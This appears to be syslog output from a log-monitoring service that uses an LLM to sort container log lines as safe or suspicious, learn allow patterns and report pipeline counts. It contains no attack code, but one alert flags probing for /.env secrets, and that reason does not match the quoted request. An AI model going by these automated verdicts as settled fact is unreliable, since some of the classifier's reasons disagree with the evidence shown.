Mar 20 13:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:06:01.946263 [observer] Pipeline: processed=5480 pattern_hits=5239 llm_calls=241 llm_errors=3 learned=3 Mar 20 13:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:06:01.946288 [observer] Patterns: hash=5239 prefix=0 
regex=0 contains=0 deny=24 alert=431 suppress=0 misses=241 Mar 20 13:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:06:31.941425 [observer] Pipeline: processed=5485 pattern_hits=5244 llm_calls=241 llm_errors=3 learned=3 Mar 20 13:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:06:31.941455 [observer] Patterns: hash=5244 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=241 Mar 20 13:07:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:07:02.001734 [observer] Pipeline: processed=5487 pattern_hits=5246 llm_calls=241 llm_errors=3 learned=3 Mar 20 13:07:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:07:02.001775 [observer] Patterns: hash=5246 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=241 Mar 20 13:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:07:31.935208 [observer] Pipeline: processed=5491 pattern_hits=5250 llm_calls=241 llm_errors=3 learned=3 Mar 20 13:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:07:31.935236 [observer] Patterns: hash=5250 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=241 Mar 20 13:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:08:01.971299 [observer] Pipeline: processed=5493 pattern_hits=5252 llm_calls=241 llm_errors=3 learned=3 Mar 20 13:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:08:01.971484 [observer] Patterns: hash=5252 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=241 Mar 20 13:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:08:31.935069 [observer] Pipeline: processed=5497 pattern_hits=5256 llm_calls=241 llm_errors=3 learned=3 Mar 20 13:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:08:31.935109 [observer] Patterns: hash=5256 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=241 Mar 20 13:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:09:01.978092 [observer] Pipeline: processed=5499 pattern_hits=5258 llm_calls=241 llm_errors=3 learned=3 Mar 20 13:09:01 
ip-172-26-12-110 observer[1565011]: 2026/03/20 13:09:01.978347 [observer] Patterns: hash=5258 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=241 Mar 20 13:09:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:09:30.678893 [analyzer] LLM verdict for docker:srv-captain--media-api.1.8iw1rx1hsebohsltxip133ftf: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 20 13:09:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:09:30.678942 [analyzer] Source hint mismatch: LLM says "nginx", actual is "srv-captain--media-api.1.8iw1rx1hsebohsltxip133ftf" — skipping pattern Mar 20 13:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:09:31.658898 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 13:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:09:31.658936 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Automated access with a blocked robots.txt response from a known bot user-agent (OAI-SearchBot).May indicate bot scanning or probing activity. Line=2026-03-20T13:09:22.628028332Z 74.7.230.5 - - [20/Mar/2026:13:09:22 +0000] "media-api.admin.kovicloud.com" "GET /robots.txt HTTP/2.0" 403 325 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Apple... 
Mar 20 13:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:09:31.935791 [observer] Pipeline: processed=5505 pattern_hits=5260 llm_calls=245 llm_errors=3 learned=3 Mar 20 13:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:09:31.935816 [observer] Patterns: hash=5260 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=245 Mar 20 13:09:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:09:38.410498 [analyzer] LLM verdict for docker:srv-captain--media-api.1.8iw1rx1hsebohsltxip133ftf: classification=safe confidence=0.75 action=allow pattern_type=prefix Mar 20 13:09:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:09:38.410536 [analyzer] Source hint mismatch: LLM says "nginx_access_log", actual is "srv-captain--media-api.1.8iw1rx1hsebohsltxip133ftf" — skipping pattern Mar 20 13:09:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:09:40.916841 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.70 action=allow pattern_type=prefix Mar 20 13:09:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:09:40.916896 [analyzer] Confidence 0.70 too low for pattern learning (need 0.85+) Mar 20 13:09:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:09:40.917346 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T13:09:25.612676900Z 74.7.243.244 - - [20/Mar/2026:13:09:25 +0000] "media.admin.kovicloud.com" "GET / HTTP/2.0" 200 1309 "https://media-api.admin.kovicloud.com" "Mozilla/5.0 AppleWebKit/537.... 
Mar 20 13:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:10:01.941949 [observer] Pipeline: processed=5511 pattern_hits=5266 llm_calls=245 llm_errors=3 learned=3 Mar 20 13:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:10:01.941975 [observer] Patterns: hash=5266 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=245 Mar 20 13:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:10:31.945986 [observer] Pipeline: processed=5513 pattern_hits=5268 llm_calls=245 llm_errors=3 learned=3 Mar 20 13:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:10:31.946016 [observer] Patterns: hash=5268 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=245 Mar 20 13:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:11:01.944054 [observer] Pipeline: processed=5517 pattern_hits=5272 llm_calls=245 llm_errors=3 learned=3 Mar 20 13:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:11:01.944080 [observer] Patterns: hash=5272 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=245 Mar 20 13:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:11:31.946331 [observer] Pipeline: processed=5521 pattern_hits=5276 llm_calls=245 llm_errors=3 learned=3 Mar 20 13:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:11:31.946356 [observer] Patterns: hash=5276 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=245 Mar 20 13:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:01.941869 [observer] Pipeline: processed=5525 pattern_hits=5280 llm_calls=245 llm_errors=3 learned=3 Mar 20 13:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:01.941898 [observer] Patterns: hash=5280 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=245 Mar 20 13:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:31.535365 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.77 action=allow pattern_type=prefix Mar 20 13:12:31 ip-172-26-12-110 
observer[1565011]: 2026/03/20 13:12:31.535411 [analyzer] Confidence 0.77 too low for pattern learning (need 0.85+) Mar 20 13:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:31.935019 [observer] Pipeline: processed=5531 pattern_hits=5283 llm_calls=248 llm_errors=3 learned=3 Mar 20 13:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:31.935042 [observer] Patterns: hash=5283 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=248 Mar 20 13:12:33 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:33.982517 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.85 action=allow pattern_type=prefix Mar 20 13:12:33 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:33.982555 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 20 13:12:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:38.827865 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 20 13:12:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:38.827904 [analyzer] Confidence 0.78 too low for pattern learning (need 0.85+) Mar 20 13:12:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:40.410841 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.80 action=allow pattern_type=prefix Mar 20 13:12:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:40.410886 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 20 13:12:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:43.787949 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.73 action=allow pattern_type=prefix Mar 20 13:12:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 
13:12:43.787988 [analyzer] Confidence 0.73 too low for pattern learning (need 0.85+) Mar 20 13:12:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:46.599313 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.75 action=allow pattern_type=prefix Mar 20 13:12:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:46.599343 [hints] Suggestion for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: field type "duration" seen in 20/20 lines, example: "3.085 ms" → "" Mar 20 13:12:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:46.599352 [hints] Suggestion for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: field type "byte_count" seen in 18/20 lines, example: "7584137" → "" Mar 20 13:12:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:46.599363 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 20 13:12:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:52.239717 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.80 action=allow pattern_type=prefix Mar 20 13:12:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:52.239761 [analyzer] Source hint mismatch: LLM says "docker", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 20 13:12:55 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:55.427560 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.75 action=allow pattern_type=prefix Mar 20 13:12:55 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:55.427597 [analyzer] Confidence 0.75 too low for pattern learning (need 0.85+) Mar 20 13:13:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:13:02.020522 [observer] Pipeline: processed=5537 pattern_hits=5283 llm_calls=254 llm_errors=3 learned=3 Mar 20 13:13:02 ip-172-26-12-110 observer[1565011]: 
2026/03/20 13:13:02.020560 [observer] Patterns: hash=5283 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=254 Mar 20 13:13:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:13:04.511782 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.85 action=allow pattern_type=prefix Mar 20 13:13:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:13:04.511822 [analyzer] Learned prefix pattern for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo [allow]: "captain.admin.kovicloud.com" Mar 20 13:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:13:31.938192 [observer] Pipeline: processed=5543 pattern_hits=5289 llm_calls=254 llm_errors=3 learned=4 Mar 20 13:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:13:31.938216 [observer] Patterns: hash=5289 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=254 Mar 20 13:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:14:01.960684 [observer] Pipeline: processed=5545 pattern_hits=5291 llm_calls=254 llm_errors=3 learned=4 Mar 20 13:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:14:01.963854 [observer] Patterns: hash=5291 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=254 Mar 20 13:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:14:31.935668 [observer] Pipeline: processed=5549 pattern_hits=5295 llm_calls=254 llm_errors=3 learned=4 Mar 20 13:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:14:31.935693 [observer] Patterns: hash=5295 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=254 Mar 20 13:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:15:01.955771 [observer] Pipeline: processed=5551 pattern_hits=5297 llm_calls=254 llm_errors=3 learned=4 Mar 20 13:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:15:01.955817 [observer] Patterns: hash=5297 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=254 Mar 20 13:15:31 ip-172-26-12-110 observer[1565011]: 
2026/03/20 13:15:31.937758 [observer] Pipeline: processed=5555 pattern_hits=5301 llm_calls=254 llm_errors=3 learned=4 Mar 20 13:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:15:31.937786 [observer] Patterns: hash=5301 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=254 Mar 20 13:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:16:01.951055 [observer] Pipeline: processed=5557 pattern_hits=5303 llm_calls=254 llm_errors=3 learned=4 Mar 20 13:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:16:01.951081 [observer] Patterns: hash=5303 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=254 Mar 20 13:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:16:31.935815 [observer] Pipeline: processed=5562 pattern_hits=5308 llm_calls=254 llm_errors=3 learned=4 Mar 20 13:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:16:31.935840 [observer] Patterns: hash=5308 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=254 Mar 20 13:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:17:01.972022 [observer] Pipeline: processed=5565 pattern_hits=5311 llm_calls=254 llm_errors=3 learned=4 Mar 20 13:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:17:01.972084 [observer] Patterns: hash=5311 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=254 Mar 20 13:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:17:31.935642 [observer] Pipeline: processed=5567 pattern_hits=5313 llm_calls=254 llm_errors=3 learned=4 Mar 20 13:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:17:31.935667 [observer] Patterns: hash=5313 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=254 Mar 20 13:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:18:01.980834 [observer] Pipeline: processed=5571 pattern_hits=5317 llm_calls=254 llm_errors=3 learned=4 Mar 20 13:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:18:01.980869 [observer] Patterns: hash=5317 prefix=0 regex=0 contains=0 
deny=24 alert=432 suppress=0 misses=254 Mar 20 13:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:18:31.946481 [observer] Pipeline: processed=5573 pattern_hits=5319 llm_calls=254 llm_errors=3 learned=4 Mar 20 13:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:18:31.946513 [observer] Patterns: hash=5319 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=254 Mar 20 13:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:19:01.955592 [observer] Pipeline: processed=5577 pattern_hits=5323 llm_calls=254 llm_errors=3 learned=4 Mar 20 13:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:19:01.955625 [observer] Patterns: hash=5323 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=254 Mar 20 13:19:10 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:19:10.599609 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.80 action=allow pattern_type=prefix Mar 20 13:19:10 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:19:10.599649 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 20 13:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:19:31.946583 [observer] Pipeline: processed=5580 pattern_hits=5325 llm_calls=255 llm_errors=3 learned=4 Mar 20 13:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:19:31.946606 [observer] Patterns: hash=5325 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=255 Mar 20 13:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:20:01.960946 [observer] Pipeline: processed=5583 pattern_hits=5328 llm_calls=255 llm_errors=3 learned=4 Mar 20 13:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:20:01.961000 [observer] Patterns: hash=5328 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=255 Mar 20 13:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:20:31.937135 [observer] Pipeline: processed=5586 pattern_hits=5331 
llm_calls=255 llm_errors=3 learned=4 Mar 20 13:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:20:31.937187 [observer] Patterns: hash=5331 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=255 Mar 20 13:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:21:01.967975 [observer] Pipeline: processed=5588 pattern_hits=5333 llm_calls=255 llm_errors=3 learned=4 Mar 20 13:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:21:01.968007 [observer] Patterns: hash=5333 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=255 Mar 20 13:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:21:31.935084 [observer] Pipeline: processed=5592 pattern_hits=5337 llm_calls=255 llm_errors=3 learned=4 Mar 20 13:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:21:31.935111 [observer] Patterns: hash=5337 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=255 Mar 20 13:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:22:01.972084 [observer] Pipeline: processed=5596 pattern_hits=5341 llm_calls=255 llm_errors=3 learned=4 Mar 20 13:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:22:01.972111 [observer] Patterns: hash=5341 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=255 Mar 20 13:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:22:31.937497 [observer] Pipeline: processed=5600 pattern_hits=5345 llm_calls=255 llm_errors=3 learned=4 Mar 20 13:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:22:31.937528 [observer] Patterns: hash=5345 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=255 Mar 20 13:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:23:01.962053 [observer] Pipeline: processed=5602 pattern_hits=5347 llm_calls=255 llm_errors=3 learned=4 Mar 20 13:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:23:01.962085 [observer] Patterns: hash=5347 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=255 Mar 20 13:23:31 ip-172-26-12-110 
observer[1565011]: 2026/03/20 13:23:31.936876 [observer] Pipeline: processed=5605 pattern_hits=5350 llm_calls=255 llm_errors=3 learned=4 Mar 20 13:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:23:31.936903 [observer] Patterns: hash=5350 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=255 Mar 20 13:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:24:01.947282 [observer] Pipeline: processed=5608 pattern_hits=5353 llm_calls=255 llm_errors=3 learned=4 Mar 20 13:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:24:01.947307 [observer] Patterns: hash=5353 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=255 Mar 20 13:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:24:31.935373 [observer] Pipeline: processed=5610 pattern_hits=5355 llm_calls=255 llm_errors=3 learned=4 Mar 20 13:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:24:31.935395 [observer] Patterns: hash=5355 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=255 Mar 20 13:25:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:25:02.026087 [observer] Pipeline: processed=5614 pattern_hits=5359 llm_calls=255 llm_errors=3 learned=4 Mar 20 13:25:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:25:02.026124 [observer] Patterns: hash=5359 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=255 Mar 20 13:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:25:31.936364 [observer] Pipeline: processed=5616 pattern_hits=5361 llm_calls=255 llm_errors=3 learned=4 Mar 20 13:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:25:31.936393 [observer] Patterns: hash=5361 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=255 Mar 20 13:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:26:01.962257 [observer] Pipeline: processed=5620 pattern_hits=5365 llm_calls=255 llm_errors=3 learned=4 Mar 20 13:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:26:01.962304 [observer] Patterns: hash=5365 prefix=0 
regex=0 contains=0 deny=24 alert=432 suppress=0 misses=255 Mar 20 13:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:26:31.946132 [observer] Pipeline: processed=5622 pattern_hits=5367 llm_calls=255 llm_errors=3 learned=4 Mar 20 13:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:26:31.946178 [observer] Patterns: hash=5367 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=255 Mar 20 13:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:27:01.948143 [observer] Pipeline: processed=5627 pattern_hits=5372 llm_calls=255 llm_errors=3 learned=4 Mar 20 13:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:27:01.948184 [observer] Patterns: hash=5372 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=255 Mar 20 13:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:27:31.935144 [observer] Pipeline: processed=5630 pattern_hits=5375 llm_calls=255 llm_errors=3 learned=4 Mar 20 13:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:27:31.935196 [observer] Patterns: hash=5375 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=255 Mar 20 13:27:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:27:41.986482 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.92 action=allow pattern_type=prefix Mar 20 13:27:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:27:41.986520 [analyzer] Source hint mismatch: LLM says "http_server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 20 13:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:28:01.955415 [observer] Pipeline: processed=5634 pattern_hits=5378 llm_calls=256 llm_errors=3 learned=4 Mar 20 13:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:28:01.955447 [observer] Patterns: hash=5378 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=256 Mar 20 13:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:28:31.938180 [observer] Pipeline: 
processed=5638 pattern_hits=5382 llm_calls=256 llm_errors=3 learned=4 Mar 20 13:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:28:31.938206 [observer] Patterns: hash=5382 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=256 Mar 20 13:29:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:29:02.009109 [observer] Pipeline: processed=5640 pattern_hits=5384 llm_calls=256 llm_errors=3 learned=4 Mar 20 13:29:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:29:02.009136 [observer] Patterns: hash=5384 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=256 Mar 20 13:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:29:31.936542 [observer] Pipeline: processed=5644 pattern_hits=5388 llm_calls=256 llm_errors=3 learned=4 Mar 20 13:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:29:31.936567 [observer] Patterns: hash=5388 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=256 Mar 20 13:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:30:01.951668 [observer] Pipeline: processed=5646 pattern_hits=5390 llm_calls=256 llm_errors=3 learned=4 Mar 20 13:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:30:01.951697 [observer] Patterns: hash=5390 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=256 Mar 20 13:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:30:31.934943 [observer] Pipeline: processed=5649 pattern_hits=5393 llm_calls=256 llm_errors=3 learned=4 Mar 20 13:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:30:31.934968 [observer] Patterns: hash=5393 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=256 Mar 20 13:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:31:01.943406 [observer] Pipeline: processed=5652 pattern_hits=5396 llm_calls=256 llm_errors=3 learned=4 Mar 20 13:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:31:01.943531 [observer] Patterns: hash=5396 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=256 Mar 20 
13:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:31:31.940795 [observer] Pipeline: processed=5654 pattern_hits=5398 llm_calls=256 llm_errors=3 learned=4 Mar 20 13:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:31:31.940826 [observer] Patterns: hash=5398 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=256 Mar 20 13:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:32:01.961250 [observer] Pipeline: processed=5660 pattern_hits=5404 llm_calls=256 llm_errors=3 learned=4 Mar 20 13:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:32:01.961286 [observer] Patterns: hash=5404 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=256 Mar 20 13:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:32:31.937381 [observer] Pipeline: processed=5662 pattern_hits=5406 llm_calls=256 llm_errors=3 learned=4 Mar 20 13:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:32:31.937413 [observer] Patterns: hash=5406 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=256 Mar 20 13:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:33:01.950424 [observer] Pipeline: processed=5666 pattern_hits=5410 llm_calls=256 llm_errors=3 learned=4 Mar 20 13:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:33:01.950452 [observer] Patterns: hash=5410 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=256 Mar 20 13:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:33:31.943284 [observer] Pipeline: processed=5668 pattern_hits=5412 llm_calls=256 llm_errors=3 learned=4 Mar 20 13:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:33:31.943308 [observer] Patterns: hash=5412 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=256 Mar 20 13:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:34:01.954575 [observer] Pipeline: processed=5670 pattern_hits=5414 llm_calls=256 